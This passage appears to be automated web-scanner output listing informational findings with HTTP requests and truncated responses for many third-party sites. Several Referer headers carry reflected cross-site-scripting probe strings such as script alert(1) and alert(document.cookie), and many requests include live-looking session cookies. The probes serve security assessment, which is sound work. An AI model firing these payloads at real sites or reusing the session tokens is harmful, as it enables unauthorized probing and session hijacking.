Severity:	Information
Confidence:	Certain
Host:	http://noisybox.net
Path:	/computers/nzbperl/

Request

GET /computers/nzbperl/ HTTP/1.1
Host: noisybox.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.92. http://people.joomla.org/modules/mod_pixsearch_ng/media/js/gpixsearch/EC114CAD1010D1980F044A461CE47B22.cache.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://people.joomla.org
Path:	/modules/mod_pixsearch_ng/media/js/gpixsearch/EC114CAD1010D1980F044A461CE47B22.cache.html

Request

GET /modules/mod_pixsearch_ng/media/js/gpixsearch/EC114CAD1010D1980F044A461CE47B22.cache.html HTTP/1.1
Host: people.joomla.org
Proxy-Connection: keep-alive
Referer: http://people.joomla.org/groups/viewdiscussion/996-Joomla%C3%82%C2%AE%2016%20Has%20Arrived.html?groupid=7141e57e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee630941430d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295967274.1.1.utmcsr=joomlacode.org|utmccn=(referral)|utmcmd=referral|utmcct=/gf/project/joomla/reporting/; 33e27d3d0725f34a77c307be63476b5b=e0d536d51f63412f1cb4302ffe89e94c; currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html%3Fgroupid%3D7141e57e%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be630941430d; __utma=11952431.110894349.1295967274.1295967274.1295967274.1; __utmc=11952431; __utmb=11952431.3.10.1295967274; __utmz=173056674.1295968217.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/68; __utma=173056674.779126497.1295968217.1295968217.1295968217.1; __utmc=173056674; __utmb=173056674.1.10.1295968217

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:10:20 GMT
Server: Apache
Last-Modified: Fri, 30 Jul 2010 23:04:40 GMT
ETag: "1980508-11a5d-48ca2e025b200"
Accept-Ranges: bytes
Content-Length: 72285
Content-Type: text/html

<html><head><meta charset="UTF-8" /><script>var $gwt_version = "2.0.4";var $wnd = parent;var $doc = $wnd.document;var $moduleName, $moduleBase;var $strongName = 'EC114CAD1010D1980F044A461CE47B22';var
...[SNIP]...

30.93. http://pessoal.org/papercut/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pessoal.org
Path:	/papercut/

Request

GET /papercut/ HTTP/1.1
Host: pessoal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:03 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 11535

<html>
<head>
<title>papercut.org - nntp server for the masses</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen">
</head>

<body bgcolor="#fff8d8">

<table border="0" wid
...[SNIP]...

30.94. http://picmonger.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://picmonger.sourceforge.net
Path:	/

Request

GET / HTTP/1.1
Host: picmonger.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 16:02:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.11
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 16:02:06 GMT
Content-Length: 2513

<HTML>
<HEAD>
<TITLE>SourceForge: Welcome</TITLE>
<LINK rel="stylesheet" href="http://sourceforge.net/sourceforge.css" type="text/css">
</HEAD>

<BODY bgcolor=#FFFFFF topmargin="0" bottommargin="0" le
...[SNIP]...

30.95. http://r.nexac.com/e/getdata.xgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.nexac.com
Path:	/e/getdata.xgi

Request

GET /e/getdata.xgi HTTP/1.1
Host: r.nexac.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: na_tc=Y;

Response

HTTP/1.1 200 OK
Connection: close
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 24 Jan 2011 22:48:52 GMT
Server: lighttpd/1.4.18
Content-Length: 30

na_id=&na_mp=&na_mg=BR&na_da=

30.96. http://seattletimes.nwsource.com/html/businesstechnology/2014020427_amazon24.html/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seattletimes.nwsource.com
Path:	/html/businesstechnology/2014020427_amazon24.html/x22

Request

GET /html/businesstechnology/2014020427_amazon24.html/x22 HTTP/1.1
Host: seattletimes.nwsource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Unix) DAV/2
Last-Modified: Sat, 29 Dec 2007 17:36:52 GMT
Content-Type: text/html
Date: Mon, 24 Jan 2011 16:02:24 GMT
Content-Length: 1546
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<meta name="t_omni_site" content="st" />
<meta name="t_omni_pagetype" conten
...[SNIP]...

30.97. http://sites.inka.de/~bigred/sw/c-nocem.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sites.inka.de
Path:	/~bigred/sw/c-nocem.html

Request

GET /~bigred/sw/c-nocem.html HTTP/1.1
Host: sites.inka.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.98. http://tags.bluekai.com/site/10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/10

Request

Response

30.99. http://tweetmeme.com/channels previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/channels

Request

GET /channels HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.0 502 Invalid response
Cache-Control: no-cache
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tw
...[SNIP]...

30.100. http://tweetmeme.com/media/image previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/media/image

Request

GET /media/image HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

30.101. http://tweetmeme.com/media/video previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/media/video

Request

GET /media/video HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

30.102. http://tweetmeme.com/popup/follow previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/popup/follow

Request

GET /popup/follow HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:59:31 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 6.7949295043945E-5
X-Served-In: 0.0015110969543457
X-Served-By: h02
Content-Length: 1370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       
       <ti
...[SNIP]...

30.103. http://tweetmeme.com/popup/tweet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/popup/tweet

Request

GET /popup/tweet HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:00:04 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 7.7009201049805E-5
X-Served-In: 0.71491718292236
X-Served-By: h03
Content-Length: 1405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       
       <ti
...[SNIP]...

30.104. http://tweetmeme.com/story/3832254868/htc-hd2-can-now-dual-boot-windows-phone-7-and-android-promises-to-love-them-equally-engadget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3832254868/htc-hd2-can-now-dual-boot-windows-phone-7-and-android-promises-to-love-them-equally-engadget

Request

GET /story/3832254868/htc-hd2-can-now-dual-boot-windows-phone-7-and-android-promises-to-love-them-equally-engadget HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

30.105. http://tweetmeme.com/style/week previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/style/week

Request

GET /style/week HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

30.106. http://uac.advertising.com/wrapper/aceUACping.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://uac.advertising.com
Path:	/wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; F1=Bkl690kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJl2JpJh5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M9itzqEXE!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 21:32:57 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 24 Jan 2011 21:08:42 GMT
Connection: close
Content-Length: 2659

<html><head></head><body><script type='text/javascript'>
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

30.107. http://venedet.michnica.net/download/donate.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://venedet.michnica.net
Path:	/download/donate.html

Request

Response

30.108. http://whdhstore.hipcricket.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://whdhstore.hipcricket.com
Path:	/

Request

GET / HTTP/1.1
Host: whdhstore.hipcricket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.109. http://wildspark.com/asher/ija/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wildspark.com
Path:	/asher/ija/

Request

GET /asher/ija/ HTTP/1.1
Host: wildspark.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:03:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tu=fc371e99f833e248ace3a9b91346cedd; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=wildspark.com; httponly
Vary: User-Agent,Accept-Encoding
Content-Length: 6
Content-Type: text/html
X-Cache: MISS from 337663
Connection: close

<b-ua>

30.110. http://www.armanijeans-theroom.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.armanijeans-theroom.com
Path:	/

Request

GET / HTTP/1.1
Host: www.armanijeans-theroom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.111. http://www.aub.org/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aub.org
Path:	/x22

Request

GET /x22 HTTP/1.1
Host: www.aub.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:07 GMT
Content-Type: text/html
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:01:12 GMT
ETag: "169bb0d-4e4-486ced93a17fb"
Accept-Ranges: bytes
Content-Length: 1252
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>

   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

30.112. http://www.autocheck.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autocheck.com
Path:	/

Request

GET /?WT.mc_id=1824&siteID=1824 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.113. http://www.autotrader.com/inc/ad.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/inc/ad.html

Request

GET /inc/ad.html?Log=0&v=3.17.167500 HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:43 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 18:36:49 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=604800
Content-Type: text/html
Content-Length: 1999

<html>
<head>
<script src="http://ads.autotrader.com/DE/DartRichMedia_1_03.js" type="text/javascript"></script>
<script src="http://ads.autotrader.com/DE/flash8.js" type="text/javascript"></sc
...[SNIP]...

30.114. http://www.autotraderclassics.com/find/index.xhtml/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotraderclassics.com
Path:	/find/index.xhtml/x22

Request

GET /find/index.xhtml/x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.115. http://www.autotraderclassics.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotraderclassics.com
Path:	/x22

Request

GET /x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.116. http://www.bymnews.com/news/newsList.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bymnews.com
Path:	/news/newsList.php

Request

GET /news/newsList.php HTTP/1.1
Host: www.bymnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:15:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Content-Length: 5025
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: Smarty error: unable to read resource: "" in <b>/home/bymnews/newsLib/smarty/Smarty.class.php</b> on line <b>1088</b><br />

<ul class="menu">
<li><a href="
...[SNIP]...

30.117. http://www.careersingear.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.careersingear.com
Path:	/

Request

GET / HTTP/1.1
Host: www.careersingear.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.118. http://www.carsdirect.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.carsdirect.com
Path:	/x22

Request

GET /x22 HTTP/1.1
Host: www.carsdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.119. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Request

GET /cgi/url.cgi HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:10 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 132

<html><head><title>Invalid URL</title></head>
<body><h1>Invalid URL</h1>
<p>Only http://*.freebsd.* is allowed.
</p>
</body></html>

30.120. http://www.google.com/instant/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/instant/

Request

GET /instant/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 07:45:29 GMT
Date: Mon, 24 Jan 2011 16:39:52 GMT
Expires: Mon, 24 Jan 2011 16:39:52 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>
Google Instant
</title>
<link href="instant.css" rel="stylesheet">
<meta content="Google Instant" nam
...[SNIP]...

30.121. http://www.google.com/intl/en/about.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/intl/en/about.html

Request

GET /intl/en/about.html HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 04:42:49 GMT
Date: Mon, 24 Jan 2011 16:39:56 GMT
Expires: Mon, 24 Jan 2011 16:39:56 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang="en">
<meta charset="utf-8">
<title>About Google</title>
<link href="http://www.google.com/css/gcs.css" rel="stylesheet">
<style>
h1 {
color:#636363;
float:left;
font
...[SNIP]...

30.122. http://www.google.com/intl/en/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/intl/en/ads/

Request

GET /intl/en/ads/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 18 Jan 2011 22:49:46 GMT
Date: Mon, 24 Jan 2011 16:39:55 GMT
Expires: Mon, 24 Jan 2011 16:39:55 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
